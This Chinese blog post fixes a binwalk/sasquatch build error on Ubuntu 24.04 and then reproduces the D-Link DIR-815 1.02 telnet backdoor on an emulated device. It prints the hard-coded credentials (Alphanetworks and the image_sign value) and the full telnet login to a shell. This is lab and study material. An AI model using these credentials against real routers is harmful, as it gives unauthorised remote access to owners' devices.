-
-
[原创]ubuntu24.04 binwalk squashfs-root 文件夹为空及D-Link DIR-815后门漏洞复现
-
-
[原创]ubuntu24.04 binwalk squashfs-root 文件夹为空及D-Link DIR-815后门漏洞复现
ubuntu24.04 binwalk squashfs-root 文件夹为空
今天在复现 D-Link DIR-815 后门漏洞 时,binwalk提取D-Link 1.02版本固件时,squashfs-root 文件夹为空
首先确保你已经安装过squashfs-tools, 如果没有请你使用
1 | sudo apt install squashfs-tools
|
在提取固件时:
1 | binwalk -Me dir815_FW_102.bin
|
提示报错为:
1 2 3 4 | WARNING: Extractor.execute failed to run external extractor 'sasquatch -p 1 -le -d 'squashfs-root' '%e'': [Errno 2] No such file or directory: 'sasquatch', 'sasquatch -p 1 -le -d 'squashfs-root' '%e'' might not be installed correctly
WARNING: Extractor.execute failed to run external extractor 'sasquatch -p 1 -be -d 'squashfs-root' '%e'': [Errno 2] No such file or directory: 'sasquatch', 'sasquatch -p 1 -be -d 'squashfs-root' '%e'' might not be installed correctly
983180 0xF008C Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2783169 bytes, 1526 inodes, blocksize: 262144 bytes, created: 2012-01-19 04:03:49
|
这是缺少一个名为sasquatch的工具,sasquatch 是一个用于解压 SquashFS 文件系统(一种常见的嵌入式设备只读文件系统)的组件或插件,当 Binwalk 扫描到 SquashFS 格式的压缩文件时,它会尝试使用 sasquatch 提取其中的内容。
1 2 | git clone https://github.com/devttys0/sasquatch
cd sasquatch && ./build.sh
|
安装后,大概率会提示以下错误:
1 2 3 4 5 6 7 8 | unsquashfs.c:1835:5: error: this ‘if’ clause does not guard... [-Werror=misleading-indentation]
1835 | if(swap)
| ^~
unsquashfs.c:1841:9: note: ...this statement, but the latter is misleadingly indented as if it were guarded by the ‘if’
1841 | read_fs_bytes(fd, SQUASHFS_START, sizeof(struct squashfs_super_block),
| ^~~~~~~~~~~~~
cc1: all warnings being treated as errors
make: *** [<builtin>: unsquashfs.o] Error 1
|
这地方是编译时,发现歧义,看过源码后发现是因为{}的问题,尝试解决后,发现还有新的报错。有一个可使用的方案,感兴趣可以查看:
1 | https://github.com/devttys0/sasquatch/pull/56
|
具体解决办法是:
1 2 | git clone https://github.com/devttys0/sasquatch
cd sasquatch && git pull origin pull/56/head && ./build.sh
|
附带 D-Link DIR-815后门漏洞复现
D-Link DIR-815 1.02版本的路由器,dir815_FW_102.bin固件下载地址:
1 | https://legacyfiles.us.dlink.com/DIR-815/REVA/FIRMWARE/
|
1 | ➜ binwalk -Me dir815_FW_102.bin
|
然后再使用binwalk进行分离,会出现多个.extracted后缀的文件,逐个打开看看,我的是在
1 | cd _dir815_FW_102.bin-2.extracted
|
需要用到firmwalker工具:
1 2 | git clone https:
cd firmwalker
|
使用firmwalker进行信息收集,将收集的结果存入dir815.txt
1 | ./firmwalker.sh ../squashfs-root ./dir815.txt
|
重点关注init0.d的系统启动项的内容。
1 | t/etc/init0.d/S80telnetd.sh
|
然后审一下代码
1 2 3 4 5 6 7 8 9 10 11 12 13 | ➜ squashfs-root git:(master) ✗ cat etc/init0.d/S80telnetd.sh
#!/bin/sh
echo [$0]: $1 ... > /dev/console
if [ "$1" = "start" ]; then
if [ -f "/usr/sbin/login" ]; then
image_sign=`cat /etc/config/image_sign`
telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
else
telnetd &
fi
else
killall telnetd
fi
|
密码是image_sign的内容
1 2 | ➜ squashfs-root cat ./etc/config/image_sign
wrgnd08_dlob_dir815
|
下载firmAE工具模拟固件
1 2 3 4 | git clone --recursive https:
./download.sh
./install.sh
./init.sh
|
安装完成后启动
1 | sudo ./run.sh -r dir815 ./dir815_FW_102.bin
|
结果
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | ➜ FirmAE git:(master) ✗ sudo ./run.sh -r dir815 ./dir815_FW_102.bin
[sudo] password for ra1ny:
[*] ./dir815_FW_102.bin emulation start!!!
[*] Extract done!!!
[+] get architecture done!!!
[+] Start emulation!!!
[IID] 2
[MODE] run
[*] ./dir815_FW_102.bin already succeed emulation!!!
[+] Network reachable on 192.168.0.1!
[+] Web service on 192.168.0.1
Creating TAP device tap2_0...
Set 'tap2_0' persistent and owned by uid 0
Bringing up TAP device...
Starting emulation of firmware... 192.168.0.1 true true 5.169506216 25.379649267
|
1 2 3 4 5 6 7 8 9 10 11 12 | ➜ ~ nmap 192.168.0.1
Starting Nmap 7.94SVN ( https:
Nmap scan report for 192.168.0.1
Host is up (0.0064s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
23/tcp open telnet
53/tcp open domain
80/tcp open http
49152/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
|
然后talnet登入。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | ➜ ~ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
login: Alphanetworks
Password: wrgnd08_dlob_dir815
/
root www sys lib dev
run var sbin htdocs bin
etc_ro usr proc home lost+found
firmadyne tmp mnt etc
|
参考链接:
···
192K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8V1y4d9e0#2N6b7f1#2W2o6d9p5!0Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0p5K6y4K6t1J5y4U0R3$3x3R3`.`.
···
复现过程是参考《物联网安全漏洞挖掘实战》崔洪权编著。
[培训]Windows内核深度攻防:从Hook技术到Rootkit实战!
